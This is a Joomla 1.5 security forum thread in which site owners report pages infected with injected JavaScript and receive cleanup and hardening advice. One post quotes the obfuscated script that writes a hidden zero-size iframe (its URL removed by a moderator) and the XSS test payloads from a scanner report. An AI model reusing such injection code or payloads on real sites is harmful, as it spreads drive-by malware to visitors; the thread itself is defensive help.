Discussion - Malicious Javascript in your site

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
tr1
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 239
Joined: Sun Apr 30, 2006 11:35 am
Location: UK

.ftpaccess file

Post by tr1 » Thu Nov 19, 2009 8:44 am

One option my hosting provider offers as an added level of security is the use of a .ftpaccess file which can block ftp access outside of a specified range of ip addresses. This is really helpful if you normally work from the same location as, even if your ftp paswwords have been compromised, a hacker can't gain access to your site if they operate from outside the range of IP addresses that you specify in the .ftpaccess file.

chilli_mint
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Thu Sep 10, 2009 9:59 am

Re: Malicious Javascript in your site

Post by chilli_mint » Thu Nov 19, 2009 9:12 am

Thansk @tr1, I'll get in touch with my hosting provider to set this up, if possible.

If anyone wants the php script that I found in the files, PM me...I won't be posting exactly how to corrupt a Joomla site.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Malicious Javascript in your site

Post by mandville » Thu Nov 19, 2009 3:15 pm

tr1 = tha sounds interesting as normally that can only be done at a vpos root level and not a shared hosting level.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

designx9
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Sun Nov 29, 2009 10:52 am

Re: Malicious Javascript in your site

Post by designx9 » Sun Nov 29, 2009 12:12 pm

Hi All,

My site was hacked second time and this time i found this script. I have checked the checklist provided in the website.

I have scanned my website acunetix web scanner free edition. i found 72 xss loopholes.

Below is the attack details of the report


The Cookie variable 5cc81001e3583f30bd107e634db40f26 has been set to 1>"><ScRiPt%20%0d%0a>alert(418726250202)%3B</ScRiPt>.

The Cookie variable ytstylefont has been set to 1"+onmouseover=alert(419746258905)+.


Can somebody explain the above report.

i have this script in 145 files and i am cleaning it out.
<script> var x = unescape("[removed encoded URL]");document.write("<i"+"fr"+"am"+"e s"+"r"+"c=""+x+"/ind"+"e"+"x.p"+"hp" w"+"id"+"th="0" he"+"i"+"ght="0" fr"+"a"+"m"+"ebor"+"de"+"r="0"><"+"/ifra"+"m"+"e>"); </script>

I dont know how the hacker managed to put in hundreds of files. Pls give me some suggestions to secure my site. currently i am on shared hosting - does dedicated hosting will solve some of the problems.

Thanks in advance for your help on this.

Cheers,
Designx9
Last edited by ooffick on Mon Nov 30, 2009 10:09 am, edited 1 time in total.
Reason: Mod Note: Removed the code to the Hacker, we don't need to promote the Hacker's website any further.

ewel
Joomla! Guru
Joomla! Guru
Posts: 522
Joined: Mon Oct 01, 2007 11:35 am

Re: Malicious Javascript in your site

Post by ewel » Sun Nov 29, 2009 2:33 pm

If you can check your FTP log you will probably find a spike of connections. If so you are hit by a trojan which found the FTP passwords in your computer.

designx9
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Sun Nov 29, 2009 10:52 am

Re: Malicious Javascript in your site

Post by designx9 » Mon Nov 30, 2009 11:57 am

Hi Evel,

Pls let me know what should i do? I have changed the FTP password. I have cleaned the files but there are some files still there is javascript embeded.

Please advice.

Thanks,
D
ewel wrote:If you can check your FTP log you will probably find a spike of connections. If so you are hit by a trojan which found the FTP passwords in your computer.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Malicious Javascript in your site

Post by mandville » Mon Nov 30, 2009 3:16 pm

designx9 wrote:Hi Evel,
but there are some files still there is javascript embeded.
Please advice.
Thanks,
D
do a complete overwrite of all files or trash the folders and start again
http://docs.joomla.org/Security_Checklist_7 is a good read along with the other security checklists
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

ewel
Joomla! Guru
Joomla! Guru
Posts: 522
Joined: Mon Oct 01, 2007 11:35 am

Re: Malicious Javascript in your site

Post by ewel » Mon Nov 30, 2009 4:20 pm

You could follow the following steps to fully clean and repair the website, if a good backup is not available.
I am assuming that no modifications have been made to Joomla core files which cannot be made again using a local computer copy of the modifications that had been made. I am also assuming that only html and php files have been infected - I have no experience with compromised .js files.

First, ensure A) that all local computers with FTP access to the website are free of malware, B) that the website is clean, and C) that the FTP passwords have been changed. Do not visit an infected website, do not save passwords in your FTP client and do not use FTP unless and until those three points are covered.

1. Make a backup copy of configuration.php from the root of your Joomla installation on your server.

2. Find filist.php and upload it, preferably using your cPanel instead of FTP. Then use it to list all files by date to see at which dates your site has been infected and which files have been infected. You could also consult your FTP logs to find the date on which the number of connections peaked.

3. Download a full installation package zip of the latest Joomla version. Open it and remove the installation folder as well as the configuration.php-dist. Then save and close the zip. Upload it to the root of your Joomla installation on your server, preferably using your cPanel instead of FTP. Then extract the zip.

4. Run filist.php again, to see which files with a modification date on the date of infection remain. All of these should be part of third party extensions. For the moment, forget about index.html files. You could open each of the php files with your cPanel code editor to find and remove the malicious tags. It will either be an iframe tag or a script tag, and in the last case it will have visible JavaScript writing an iframe into the page or it will be encoded/obfuscated. However, there is a good chance that part of the file was deleted when the malicious tag was injected. Therefore, it is much better to replace infected files by a clean copy that you upload, preferably using cPanel. You can take a clean copy from a downloaded package of the third party extension of which the infected file is part.

5. Now all you should have left as infected files are index.html files. To clean these manually is a huge job. Since these files will not be seen by anyone unless they try to see the content of a folder on your server through their browser you could decide to leave them. But if you email me I will send you a script I have which makes sure every subfolder has an index.html file.

Good luck!

User avatar
Prowebdesign
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 197
Joined: Sun Oct 04, 2009 10:37 am
Contact:

Re: Malicious Javascript in your site

Post by Prowebdesign » Thu Dec 03, 2009 1:01 pm

Thanks Leolam - truly helpful. Though i have never yet had to deal with such malicious js code, i will keep in mind your suggestions to keep my site uninfected ;)
Best regards,
Streamline
Web design blog and tutorials http://www.majas-lapu-izstrade.lv
http://www.uniqcube.com

User avatar
carsten888
Joomla! Ace
Joomla! Ace
Posts: 1224
Joined: Sat Feb 11, 2006 8:32 am
Contact:

Re: Malicious Javascript in your site

Post by carsten888 » Sun Dec 20, 2009 9:37 am

I got javascript turning up on a site overnight. Frontend and backend.
In fact, just overnight I get this error:
Parse error: syntax error, unexpected '<' in /home/stic2808/sitename/www/index.php on line 91
I uploaded my index.php (not downloading a copy to check what was wrong, which would have been a good idea) and the site is back, but the columns are all displayed weird because there is javascript output before the html-tag:

Code: Select all

<script>....</script>
When I disable ACESEF (extension for sef -urls) the javascript is gone, and the site displays correctly, but obviously all sef-urls do not work. (This is on a live site with 1000's of active users.)

In the admin, the menu bar does not dropdown any more and all, sliding panes are open, because underneath the html-tag is also extra code:

Code: Select all

<script>....</script>

<script>....</script>
This problem in the admin remains even if ACESEF is disabled. I also disabled all system plugins to see if that would make a difference for the backend. But the problem remains.

I had this a couple of weeks ago, same thing. I reuploaded the index.php and saw weird output. While I was searching for what was going on it was back to normal all of a sudden. :eek:

I did a search in dreamweaver for

Code: Select all

try{window.onload
in my local copy of the site and found nothing. So where could this code come from? It is obviously inserting some script somewhere. Which makes me wonder if the site was hacked.

I am now downloading all files to a separate dir, which I will scan when downloaded.
Last edited by ooffick on Sun Dec 20, 2009 3:16 pm, edited 1 time in total.
Reason: Mod Note: Removed the code of the Hacker, we don't need to promote the Hacker's website any further.
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...

User avatar
carsten888
Joomla! Ace
Joomla! Ace
Posts: 1224
Joined: Sat Feb 11, 2006 8:32 am
Contact:

Re: Malicious Javascript in your site

Post by carsten888 » Sun Dec 20, 2009 10:39 am

update:
I downloaded my entire site and did a code search and found that this code has been inserted in 1868 files in the site. PHP, html, js, also of custom extensions. So the script the hacker is running checks in file type rather then overwrites the known Joomla files.
So yes, this site was hacked.
Fortunately I have the clean files on my local development version.

I read this tread and we are talking mainly about the source of this being ftp-accounts which might have been stolen from infected pc's. Is that the only way anyone has been infected so far? I'm using filezilla on a pretty save pc. Is there any online scan that finds this ugly virus? How do I check if my pc is infected with this specific thing?
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...

User avatar
carsten888
Joomla! Ace
Joomla! Ace
Posts: 1224
Joined: Sat Feb 11, 2006 8:32 am
Contact:

Re: Malicious Javascript in your site

Post by carsten888 » Sun Dec 20, 2009 10:53 am

It may be worth noting that the ftp-account was also used in the Joomla configuration. So it might be that somehow Joomla's configuration.php was read and the ftp-accounts stolen that way.
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...

ewel
Joomla! Guru
Joomla! Guru
Posts: 522
Joined: Mon Oct 01, 2007 11:35 am

Re: Malicious Javascript in your site

Post by ewel » Sun Dec 20, 2009 12:26 pm

As I wrote in an article on my site, these Trojans tend to look for HTML and PHP files, and apparently sometimes also JS files. As far as I know they look for files with one of the following words in the file name: index, default, login, main and home. It seems that only one file per folder is injected with a malicious tag. The tags inserted are iFrames or Javascript - the latter to insert Javascript that will put an iFrame in the page. These tags are usually inserted at the end of a file or immediately after the body tag on the same line. If you have been infected by this sort of Trojan then presumably all this is true on your website.

Unless there is a security hole in Joomla, or your particular setup, that was used to get to your configuration.php I would say your local computer was infected by a Trojan horse. If your configuration.php was read then presumably the hackers going so could have done more and other things than what happened to you, and what happened seems to match the signature of those Trojans. So it seems overwhelmingly more likely that your local computer got injected than that there is a security hole in Joomla. But who knows (not me!), one of your extensions may provide hackers an opening.

Unfortunately you can never be really sure that your local computer is clean. No single anti-virus engine finds all malware, and most of them don't like it if you install several engines. But, apparently Malwarebytes is a fairly safe bet. I have ZoneAlarm which does seem to catch these things. Others reported Kapersky to be good, as well as AVG and Avast. I've also heard that NOD is good.

fasterstill
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Wed Nov 18, 2009 9:44 pm

Re: Malicious Javascript in your site

Post by fasterstill » Mon Dec 28, 2009 8:39 pm

I'm using filezilla on a pretty save pc
Simple theres your problem, Filezilla altered all my uploaded files and added a link to the bottom of my pages in the same font colour as the background so it took a while before i saw it. Have a look i bet thats your problem.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Malicious Javascript in your site

Post by mandville » Mon Dec 28, 2009 8:47 pm

fasterstill wrote:Filezilla altered all my uploaded files and added a link to the bottom of my pages in the same font colour as the background so it took a while before i saw it.
please provide proof that it was intentional on the part of FileZilla or edit your post to say you think that they used filezilla to infect your site.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

fasterstill
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Wed Nov 18, 2009 9:44 pm

Re: Malicious Javascript in your site

Post by fasterstill » Mon Dec 28, 2009 9:04 pm

OK how's this. I downloaded a free copy of Filezilla, i belive it was from softpedia. That copy altered files that were uploaded with it and added a link to the bottom of my pages without my permision or knowledge.

User avatar
ooffick
Joomla! Master
Joomla! Master
Posts: 11614
Joined: Thu Jul 17, 2008 3:10 pm
Location: Ireland
Contact:

Re: Malicious Javascript in your site

Post by ooffick » Mon Dec 28, 2009 9:23 pm

fasterstill wrote:OK how's this. I downloaded a free copy of Filezilla, i belive it was from softpedia. That copy altered files that were uploaded with it and added a link to the bottom of my pages without my permision or knowledge.
Are you sure the uploaded files were not changed by a virus?
Did you encrypt the connection to your server via SSL or TLS?

Olaf
Olaf Offick - Global Moderator
learnskills.org

User avatar
brad
Joomla! Master
Joomla! Master
Posts: 13272
Joined: Fri Aug 12, 2005 12:38 am
Location: Australia
Contact:

Re: Malicious Javascript in your site

Post by brad » Mon Dec 28, 2009 10:04 pm

In my experience, this behaviour is caused by: http://www.iss.net/threats/gumblar.html or one of it's variants. Possibly when you used your FTP client, your ftp login details were logged and then used but the virus/trojan.

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2737
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Malicious Javascript in your site

Post by PhilD » Tue Dec 29, 2009 12:33 am

@carsten888
Is there any online scan that finds this ugly virus? How do I check if my pc is infected with this specific thing?
Have you installed and run a full computer scan on your computer with Malwarebytes?

The free version works fine and people have reported success in finding malware well hidden on their computer that was not otherwise found.

Edit: Be sure you download the latest database updates (update tab) for it after installing and before scanning.
PhilD

User avatar
carsten888
Joomla! Ace
Joomla! Ace
Posts: 1224
Joined: Sat Feb 11, 2006 8:32 am
Contact:

Re: Malicious Javascript in your site

Post by carsten888 » Tue Dec 29, 2009 9:43 am

Have you installed and run a full computer scan on your computer with Malwarebytes?
Yes, did that. Nice program. Did not find anything on my pc. I am sure someone else who had the ftp-account data has been infected.
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2737
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Malicious Javascript in your site

Post by PhilD » Tue Dec 29, 2009 3:30 pm

Yes it is quite possible that one or more persons who have ftp access have been infected. Until you get a handle on things, I would disable any extra ftp accounts and encourage the others to check their computers.

As a reminder, check out Checklist #7 to use as a guide in fixing things.
PhilD

rabeel
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Fri Jan 15, 2010 7:41 pm

Re: Malicious Javascript in your site

Post by rabeel » Fri Jan 15, 2010 7:50 pm

gulenzek wrote:I have also some Web sites in Godaddy. During last 15months, my joomla installations -- 1.5.7, 1.5.8 and 1.5.11 -- have been hacked 4 times. >:( The attackers are overwriting index.php, index.html, deafult.php, default_item.php files and adding "eachbul.net/click=" together with a hexadecimal number by assigning to "click" parameter in an iframe tag.

And another incident, the attackers overwriting another address -- yourlotcar.cn:8080/index.php -- in an iframe again. Although my installations 1.5.8 and 1.5.11, I really don't understand how this happens.
I am using CuteFTP 2.0 to access my account and my computers have up-to-date anti-virus softwares.
Yes dear i am facing the same problem and my hosting is also same. I just restore it and again hacker goes to my joomla site and edit the files. so then i deleted the accounts i went to the Ubuntu Os and did changes all the things now my site is down with the joomla announcement as site is down for mantainence what to do next? any idea how to over come this problem? they are doing again and again. i do not understand what to do ?

User avatar
carsten888
Joomla! Ace
Joomla! Ace
Posts: 1224
Joined: Sat Feb 11, 2006 8:32 am
Contact:

Re: Malicious Javascript in your site

Post by carsten888 » Sat Jan 16, 2010 8:22 am

i do not understand what to do ?
- change your ftp-password
- do not just upload the old files over the new files. The site looks repared, but as the hackers had FTP access there could very well be a backdoor somewhere. So you need to REPLACE each directory instead of just overwrite it. To do this in a way so your site does not go down:
1. in your ftp make in your root a directory 'administrator2'. 2. Upload your local version of 'administrator' there. 3. When all is uploaded, change the name of 'administrator' to 'administrator_old' (site might now be crippled) and 4. quickly change the name of 'administrator2' to 'administrator' (site works again). 5. Do that for each directory. 6. make sure there are no extra files anywhere in the root (as well as anywhere in the rest of the site).

You can ask your host if they have a backup to put that back. What they will do most of the time is also, just overwriting the current site with the old site. So if there is a backdoor in the site, it will not get deleted. Letting your host restore your site with an old copy is a lot easyer, but as I discovered, the previous version was hacked as well by a previous attack. So if you do that option, download the entire site and scan it thorowly.
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...

rabeel
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Fri Jan 15, 2010 7:41 pm

Re: Malicious Javascript in your site

Post by rabeel » Sat Jan 16, 2010 7:04 pm

Thanks for the reply also tell me what kind of plugins for security i should install to make my site more secure? its currently down i just install the windows xp service pack 3 and a register anti virius. so now i change the passwords and doing all the things. but i want to know that what to do next? any idea? except the checklist what to do? when i restore my files with the old one it was showing the files so i slect if the file is newer then overwrite so it overwrite them all. so now the site is working fine like my phpbb forum but joomla is not working because when i up the site they got login to my site dont know how. so i remove the users and change the password and select down the site. thats what i did. i will appriciate if u give me more security tips.
regards
rabeel

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2737
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Malicious Javascript in your site

Post by PhilD » Sat Jan 16, 2010 11:52 pm

You can follow the Security Checklist 7 as well as the rest of the checklists

Some of the most important things is to make sure Joomla and extensions you use are up to date and no extensions you use are not on the VEL

Other things are to use a quality host that cares about security (uses suphp, files 644/directories 755 as default) and to regularly check with several different programs (not just depend on anti-virus) that computers used to access sensitive areas of a site and for ftp are clean of malware.

For replacing core Joomla files you should be using the files contained in a fresh download of the full install package. I.E. overwrite the core files with the freshly downloaded ones. This is outlined in more detail in the checklists. Any extensions/templates should be reinstalled using fresh downloads.
PhilD

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20652
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: Malicious Javascript in your site

Post by leolam » Sun Jan 17, 2010 5:43 am

Since I cannot edit my own post anymore it seems I need to post this here:

As Ewout also already pointed out as well very clearly many issues are caused by hijacked password from YOUR (!) PC.

I quote " Today you need to remember many passwords. You need a password for the Windows network logon, your e-mail account, your homepage's FTP password, online passwords (like website member account), etc. etc. etc. The list is endless. Also, you should use different passwords for each account. Because if you use only one password everywhere and someone gets this password you have a problem... A serious problem. The thief would have access to your e-mail account, homepage, etc. Unimaginable. "

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).

Strongly consider to install this!

http://keepass.info/

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

User avatar
brad
Joomla! Master
Joomla! Master
Posts: 13272
Joined: Fri Aug 12, 2005 12:38 am
Location: Australia
Contact:

Re: Malicious Javascript in your site

Post by brad » Sun Jan 17, 2010 9:15 am

Great suggestions Leo.

Everyone: Be sure to also take into account that this kind of FTP activity usually implies your local PC has been compromised in some way. Fixing up your website is just a bandaid, you need to also address your local machine and remove the trojan, which in my experience accounts for everyone of these kinds of compromises I have personally observed.

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20652
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: Malicious Javascript in your site

Post by leolam » Sun Jan 17, 2010 10:38 am

@ Brad....Can you insert this in the initial post for me so it does not goes unnoticed?

In case your site is affected a perfect script for cleaning can be obtained via Ewout on http://www.joomlaloft.com/ or your host might be able to run a script to clean your files

But again: Your own PC as stated in the sticky is the cause of most problems as is your host if they do not run suPHP (!)

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

User avatar
brad
Joomla! Master
Joomla! Master
Posts: 13272
Joined: Fri Aug 12, 2005 12:38 am
Location: Australia
Contact:

Re: Malicious Javascript in your site

Post by brad » Sun Jan 17, 2010 10:49 am

It's not our practise to link to 3rd party sites for issues like this (we do link to JED however) and beside it's a paid script as well.

You can always create a new suggested post, and the moderators can then decide if that thread needs to be stickied or not. I do think this thread is probably already confusing to users, though not your fault of course.

I'll leave it to the quite capable moderators on this section to make the final call though.

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20652
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: Malicious Javascript in your site

Post by leolam » Sun Jan 17, 2010 11:03 am

@ Brad I was pointing at the KeePass part. What is wrong about posting the link to that?
brad wrote:It's not our practise to link to 3rd party sites for issues like this (we do link to JED however) and beside it's a paid script as well.
3 hours ago on Alltogether (become a member it is free !) posted by Ewout Wierda the creator of the script:

"Meanwhile, however, this week someone asked a copy which I sent for free. Then he asked for a little support, which I gave, again for free. In the end the script made that person very happy so that was exactly what I had been after..."

What hurts this community is the formalistic approach as expressed here again regarding Ewout and his excellent extension. Pity!

What is wrong with paid scripts btw?

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -


Locked

Return to “Security in Joomla! 1.5”